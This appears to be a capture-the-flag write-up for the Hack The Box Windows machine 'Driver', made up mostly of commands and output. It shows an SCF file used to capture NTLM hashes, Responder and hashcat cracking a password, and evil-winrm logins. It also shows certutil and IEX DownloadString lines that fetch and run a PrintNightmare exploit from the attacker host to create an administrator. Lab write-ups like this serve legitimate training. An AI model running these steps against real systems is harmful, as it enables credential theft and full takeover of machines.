Driver

Hack The Box Machines Windows No Comments
$ nmap -p- -T4 -A 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-15 16:55 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m55s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-16T03:58:12
|_  start_date: 2021-10-15T16:27:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.33 seconds
5985 winrm; 445 smb; 139NetBIOS
$ nmap -sC -sV -oN nmap 10.10.11.106 10.10.11.106
-sC: equivalent to --script=default
-oN filespec (normal output)
-sV: Probe open ports to determine service/version info
Null scan (-sN) Does not set any bits (TCP flag header is 0)
SCF File Attacks; SMB Exploit via NTLM Capture
upload 
firmware.scf
[Shell]
Command=2
IconFile=\\10.10.14.207\share\test.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -wrf --lm -v -I tun0
$ sudo responder -A -I tun0

[+] Listening for events...                                                                                                                      

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:aaebafc4be3c49f8:7876DF0BDD05ADC3CB433FEB451DE1AC:010100000000000080856EFE05C2D70152B8CE442F2BFF3C0000000002000800300048004500380001001E00570049004E002D004700570030004B0044003200490034004B005200410004003400570049004E002D004700570030004B0044003200490034004B00520041002E0030004800450038002E004C004F00430041004C000300140030004800450038002E004C004F00430041004C000500140030004800450038002E004C004F00430041004C000700080080856EFE05C2D70106000400020000000800300030000000000000000000000000200000CF92C946336670BBCF45C1E8233EF4B06C6C6E3B75BA5AE7C6D57D46CFFE8B150A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E00320030003700000000000000000000000000
$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony          (tony)
1g 0:00:00:00 DONE (2021-10-15 20:52) 9.090g/s 297890p/s 297890c/s 297890C/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E3-1575M v5 @ 3.00GHz, 13889/13953 MB (4096 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433feb451de1ac:010100000000000080856efe05c2d70152b8ce442f2bff3c0000000002000800300048004500380001001e00570049004e002d004700570030004b0044003200490034004b005200410004003400570049004e002d004700570030004b0044003200490034004b00520041002e0030004800450038002e004c004f00430041004c000300140030004800450038002e004c004f00430041004c000500140030004800450038002e004c004f00430041004c000700080080856efe05c2d70106000400020000000800300030000000000000000000000000200000cf92c946336670bbcf45c1e8233ef4b06c6c6e3b75ba5ae7c6d57d46cffe8b150a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e00320030003700000000000000000000000000:liltony
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433...000000
Time.Started.....: Fri Oct 15 20:50:40 2021 (0 secs)
Time.Estimated...: Fri Oct 15 20:50:40 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   408.7 kH/s (2.66ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32768/14344385 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 28672/14344385 (0.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: softball27 -> eatme1

Started: Fri Oct 15 20:50:28 2021
Stopped: Fri Oct 15 20:50:41 2021
$ evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
b6919f936457f4e921d8842904774bc0

*Evil-WinRM* PS C:\Users\tony\Documents> ps
    385      22     5224      14436 ...13            1168 spoolsv

$python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

certutil.exe -f -split -urlcache http://10.10.14.207:8000/winpeas.exe
https://github.com/calebstewart/CVE-2021-1675
certutil.exe -f -split -urlcache http://10.10.14.207:8000/printnightmare.ps1 printnightmare.ps1

*Evil-WinRM* PS C:\Users\tony\Downloads> import-module .\printnightmare.ps1
File C:\Users\tony\Downloads\printnightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ import-module .\printnightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:\Users\tony\Downloads> 

 IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.207:8000/CVE-2021-1675.ps1')

Invoke-Nightmare -NewUser "NotExistingUser" -NewPassword "p@ssword1"

*Evil-WinRM* PS C:\Users\tony\Downloads> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dedsec
NotExistingUser
The command completed successfully.

*Evil-WinRM* PS C:\Users\tony\Downloads> 

ExecutionPolicy -Bypass


evil-winrm -i 10.10.11.106 -u 'NotExistingUser' -p 'p@ssword1'
kali@kali:~/0.htb/machines/Driver10.10.11.106$ evil-winrm -i 10.10.11.106 -u 'NotExistingUser' -p 'p@ssword1'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\NotExistingUser\Documents> cd ..\..\administrator\Desktop
*Evil-WinRM* PS C:\Users\administrator\Desktop> dir


    Directory: C:\Users\administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/16/2021   7:05 AM             34 root.txt


*Evil-WinRM* PS C:\Users\administrator\Desktop> cat root.txt
61b8662606ad94338c195222abdc99e7
*Evil-WinRM* PS C:\Users\administrator\Desktop>

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation